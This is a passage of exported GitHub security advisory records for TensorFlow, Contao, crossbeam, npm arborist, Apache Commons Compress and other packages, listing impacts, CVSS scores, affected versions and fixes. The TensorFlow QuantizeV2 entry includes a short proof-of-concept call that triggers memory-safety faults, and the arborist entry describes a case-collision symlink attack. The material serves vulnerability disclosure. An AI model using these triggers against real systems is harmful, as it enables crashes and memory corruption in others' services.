'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w4xf-2pqw-5mq7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37666'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/be7a4de6adfbd303ce08be4332554dff70362612'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:57:28Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-hr3h-x6gq-rqcp,2023-04-25T16:32:31Z,2021-08-25T14:45:01Z,,['CVE-2021-35955'],Cross site scripting via HTML attributes in the back end,"### Impact + +It is possible for untrusted users to inject malicious code into HTML attributes in the back end, which will be executed both in the element preview (back end) and on the website (front end). + +Installations are only affected if there are untrusted back end users who have the rights to modify HTML fields (e.g. TinyMCE). + +### Patches + +Update to Contao 4.4.56, 4.9.18 or 4.11.7 + +### Workarounds + +Disable all fields that allow HTML for untrusted back end users or disable the login for these users. + +### References + +https://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end + +### For more information + +If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose). + +### Credits + +Thanks to Mikhail Khramenkov and Moritz Vondano for reporting this security issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.56'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.9.0'}, {'fixed': '4.9.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.11.0'}, {'fixed': '4.11.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-hr3h-x6gq-rqcp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35955'}, {'type': 'WEB', 'url': 'https://contao.org/en/news/contao-4-9-16-and-4-11-5-are-available.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:55:48Z', 'nvd_published_at': '2021-08-12T15:15:00Z'}" +1.4.0,GHSA-g25h-jr74-qp5j,2021-08-24T13:40:09Z,2021-08-25T14:42:23Z,,['CVE-2021-37663'],Incomplete validation in `QuantizeV2`,"### Impact +Due to incomplete validation in `tf.raw_ops.QuantizeV2`, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: + +```python +import tensorflow as tf + +tf.raw_ops.QuantizeV2( + input=[1,2,3], + min_range=[1,2], + max_range=[], + T=tf.qint32, + mode='SCALED', + round_mode='HALF_AWAY_FROM_ZERO', + narrow_range=False, + axis=1, + ensure_minimum_range=3) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/quantize_op.cc#L59) has some validation but does not check that `min_range` and `max_range` both have the same non-zero number of elements. If `axis` is provided (i.e., not `-1`), then validation should check that it is a value in range for the rank of `input` tensor and then the lengths of `min_range` and `max_range` inputs match the `axis` dimension of the `input` tensor. + +### Patches +We have patched the issue in GitHub commit [6da6620efad397c85493b8f8667b821403516708](https://github.com/tensorflow/tensorflow/commit/6da6620efad397c85493b8f8667b821403516708). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g25h-jr74-qp5j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37663'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6da6620efad397c85493b8f8667b821403516708'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:40:09Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-pqqp-xmhj-wgcw,2022-08-10T23:46:42Z,2021-08-25T21:01:15Z,,['CVE-2021-32810'],crossbeam-deque Data Race before v0.7.4 and v0.8.1,"### Impact + +In the affected version of this crate, the result of the race condition is that one or more tasks in the worker queue can be popped twice instead of other tasks that are forgotten and never popped. If tasks are allocated on the heap, this can cause double free and a memory leak. If not, this still can cause a logical bug. + +Crates using `Stealer::steal`, `Stealer::steal_batch`, or `Stealer::steal_batch_and_pop` are affected by this issue. + +### Patches + +This has been fixed in crossbeam-deque 0.8.1 and 0.7.4. + +### Credits + +This issue was reported and fixed by Maor Kleinberger. + +### License + +This advisory is in the public domain.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.8.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-pqqp-xmhj-wgcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32810'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7EZILHZDRGDPOBQ4KTW3E5PPMKLHGH5N/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWHNNBJCU4EHA2X5ZAMJMGLDUYS5FEPP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYBSLIYFANZLCYWOGTIYZUM26TJRH7WU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CY5T3FCE4MUYSPKEWICLVJBBODGJ6SZE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EW5B2VTDVMJ6B3DA4VLMAMW2GGDCE2BK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LCIBFGBSL3JSVJQTNEDEIMZGZF23N2KE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCLMH7B7B2MF55ET4NQNPH7JWISFX4RT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RRPKBRXCRNGNMVFQPFD4LM3QKPEMBQQR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFUBWBYCPSSXTJGEAQ67CJUNQJBOCM26/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3LSN3B43TJSFIOB3QLPBI3RCHRU5BLO/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VQZIEJQBV3S72BHD5GKJQF3NVYNRV5CF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WGB2H35CTZDHOV3VLC5BM6VFGURLLVRP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFBZWCLG7AGLJO4A7K5IMJVPLSWZ5TJP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQDIBB7VR3ER52FMSMNJPAWNDO5SITCE/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0093.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T22:34:26Z', 'nvd_published_at': '2021-08-02T19:15:00Z'}" +1.4.0,GHSA-m8h8-v6jh-c762,2023-06-13T17:11:53Z,2021-08-25T20:49:43Z,,['CVE-2020-35904'],Incorrect buffer size in crossbeam-channel,The affected version of this crate's the bounded channel incorrectly assumes that Vec::from_iter has allocated capacity that same as the number of iterator elements. Vec::from_iter does not actually guarantee that and may allocate extra memory. The destructor of the bounded channel reconstructs Vec from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when Vec::from_iter has allocated different sizes with the number of iterator elements.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam-channel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.3'}, {'fixed': '0.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35904'}, {'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam/pull/533'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0052.html'}]","{'cwe_ids': ['CWE-131'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:51:01Z', 'nvd_published_at': None}" +1.4.0,GHSA-hv87-47h9-jcvq,2023-06-13T22:23:08Z,2021-08-25T20:43:13Z,,['CVE-2018-20993'],Uncontrolled recursion in rust-yaml,Affected versions of this crate did not prevent deep recursion while deserializing data structures. This allows an attacker to make a YAML file with deeply nested structures that causes an abort while deserializing it. The flaw was corrected by checking the recursion depth.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'yaml-rust'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20993'}, {'type': 'WEB', 'url': 'https://github.com/chyh1990/yaml-rust/pull/109'}, {'type': 'WEB', 'url': 'https://github.com/chyh1990/yaml-rust/commit/d61b49cb90391fc4f7f72a1abe597476c8651a07'}, {'type': 'PACKAGE', 'url': 'https://github.com/chyh1990/yaml-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0006.html'}]","{'cwe_ids': ['CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-2h3h-q99f-3fhc,2022-08-15T20:08:31Z,2021-08-31T16:04:03Z,,['CVE-2021-39134'],@npmcli/arborist vulnerable to UNIX Symbolic Link (Symlink) Following,"### Impact + +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +`@npmcli/arborist`, the library that calculates dependency trees and manages the `node_modules` folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. + +This is, in part, accomplished by resolving dependency specifiers defined in `package.json` manifests for dependencies with a specific name, and nesting folders to resolve conflicting dependencies. + +When multiple dependencies differ only in the case of their name, Arborist's internal data structure saw them as separate items that could coexist within the same level in the `node_modules` hierarchy. However, on case-insensitive file systems (such as macOS and Windows), this is not the case. Combined with a symlink dependency such as `file:/some/path`, this allowed an attacker to create a situation in which arbitrary contents could be written to any location on the filesystem. + +For example, a package `pwn-a` could define a dependency in their `package.json` file such as `""foo"": ""file:/some/path""`. Another package, `pwn-b` could define a dependency such as `FOO: ""file:foo.tgz""`. On case-insensitive file systems, if `pwn-a` was installed, and then `pwn-b` was installed afterwards, the contents of `foo.tgz` would be written to `/some/path`, and any existing contents of `/some/path` would be removed. + +Anyone using npm v7.20.6 or earlier on a case-insensitive filesystem is potentially affected. + +### Patches + +2.8.2 (included in npm v7.20.7 and above) + +### Fix and Caveats + +There are two parts to the fix: + +1. Immediately prior to extraction, if the target folder is not a directory, it is moved aside. (If the installation fails, filesystem entries moved aside in this manner are moved back as part of the rollback process.) +2. The `children` map that represents child nodes in the tree is replaced with a case-insensitive map object, such that `node.children.get('foo')` and `node.children.get('FOO')` will return the same object, enabling Arborist to detect and handle this class of tree collision. + +This second item imposes a caveat on case _sensitive_ filesystems where two packages with names which differ only in case may already exist at the same level in the tree, causing unpredictable behavior in this rare edge case. Note that in such cases, the `package-lock.json` already creates a situation which is hazardous to use on case-sensitive filesystems, and will likely lead to other problems. + +If affected by this caveat, please run `npm update` to rebuild your tree and generate a new `package-lock.json` file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@npmcli/arborist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/arborist/security/advisories/GHSA-2h3h-q99f-3fhc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39134'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/arborist'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@npmcli/arborist'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-178', 'CWE-59', 'CWE-61'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:02:46Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}" +1.4.0,GHSA-mc84-pj99-q6hh,2022-02-08T21:03:07Z,2021-08-02T16:55:53Z,,['CVE-2021-36090'],Improper Handling of Length Parameter Inconsistency in Compress,"When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36090'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25f4c44616045085bc3cf901bb7e68e445eee53d1966fc08998fc456@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3227b1287e5bd8db6523b862c22676b046ad8f4fc96433225f46a2bd@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4f03c5de923e3f2a8c316248681258125140514ef3307bfe1538e1ab@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54049b66afbca766b6763c7531e9fe7a20293a112bcb65462a134949@%3Ccommits.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75ffc7a461e7e7ae77690fa75bd47bb71365c732e0fbcc44da4f8ff5@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a23d4dbf4e34d498664080bff59f2893b855eb16dae33e4aa92fa53@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5fa2ee61828fa2e42361b58468717e84902dd71c4aea8dc0b865df7@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbbf42642c3e4167788a7c13763d192ee049604d099681f765385d99d@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7df4c2f0bbe2028a1498a46d322c91184f7a369e3e4c57d9518cacf@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd5412a5b9a25aed2a02c3317052d38a97128314d50bc1ed36e81d38@%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf3f0a09fee197168a813966c5816157f6c600a47313a0d6813148ea6@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf93b6bb267580e01deb7f3696f7eaca00a290c66189a658cf7230a1a@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/6'}]","{'cwe_ids': ['CWE-130'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T19:37:10Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}" +1.4.0,GHSA-9f8c-f7h4-xghf,2021-05-04T22:11:39Z,2021-08-02T17:28:53Z,,['CVE-2020-1057'],Remote code execution in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1172, CVE-2020-1180.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1057'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6500'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1057'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:11:39Z', 'nvd_published_at': '2020-09-11T17:15:00Z'}" +1.4.0,GHSA-gq4h-f254-7cw9,2023-06-13T21:53:00Z,2021-08-25T21:00:34Z,,[],Data races in ticketed_lock,"Affected versions of this crate unconditionally implemented `Send` for `ReadTicket` & `WriteTicket`. +This allows to send non-Send `T` to other threads. + +This can allows creating data races by cloning types with internal mutability and sending them to other threads (as `T` of `ReadTicket`/`WriteTicket`). Such data races can cause memory corruption or other undefined behavior. + +The flaw was corrected in commit `a986a93` by adding `T: Send` bounds to `Send` impls of `ReadTicket`/`WriteTicket`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ticketed_lock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kvark/ticketed_lock/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/kvark/ticketed_lock/commit/a986a9335d591fa5c826157d1674d47aa525357f'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0119.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T21:48:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-h3mf-4fwp-59c7,2021-08-24T18:08:17Z,2021-08-05T19:58:06Z,2021-08-24T18:08:17Z,[],VecStorage Deserialize Allows Violation of Length Invariant,"The `Deserialize` implementation for `VecStorage` did not maintain the invariant that the number of elements must equal `nrows * ncols`. Deserialization of specially crafted inputs could allow memory access beyond allocation of the vector. + +This flaw was introduced in v0.11.0 ([`086e6e`](https://github.com/dimforge/nalgebra/commit/086e6e719f53fecba6dadad2e953a487976387f5)) due to the addition of an automatically derived implementation of `Deserialize` for `MatrixVec`. `MatrixVec` was later renamed to `VecStorage` in v0.16.13 ([`0f66403`](https://github.com/dimforge/nalgebra/commit/0f66403cbbe9eeac15cedd8a906c0d6a3d8841f2)) and continued to use the automatically derived implementation of `Deserialize`. + +This flaw was corrected in commit [`5bff536`](https://github.com/dimforge/nalgebra/commit/5bff5368bf38ddfa31416e4ae9897b163031a513) by returning an error during deserialization if the number of elements does not exactly match the expected size. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'nalgebra'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/issues/883'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/pull/889'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/commit/a803271fcce75b7c151e92aa099dfa546db4adc5'}, {'type': 'PACKAGE', 'url': 'https://github.com/dimforge/nalgebra'}, {'type': 'WEB', 'url': 'https://github.com/dimforge/nalgebra/blob/dev/CHANGELOG.md#0270'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0070.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T19:57:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-wgx2-6432-j3fw,2021-08-19T21:07:53Z,2021-08-25T20:48:04Z,,['CVE-2020-35880'],Unsoundness in bigint,An issue was discovered in the bigint crate through 2020-05-07 for Rust. It allows a soundness violation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bigint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35880'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/pull/290'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/bigint/commit/7e71521a61b009afc94c91135353102658550d42'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/bigint'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0025.html'}]","{'cwe_ids': ['CWE-704'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:07:53Z', 'nvd_published_at': None}" +1.4.0,GHSA-cmgw-8vpc-rc59,2021-08-24T18:47:39Z,2021-08-25T14:38:57Z,,['CVE-2021-37692'],"Segfault on strings tensors with mistmatched dimensions, due to Go code","### Impact +Under certain conditions, Go code can trigger a segfault in string deallocation. + + +For string tensors, `C.TF_TString_Dealloc` is called during garbage collection within a finalizer function. However, tensor structure isn't checked until encoding to avoid a performance penalty. The current method 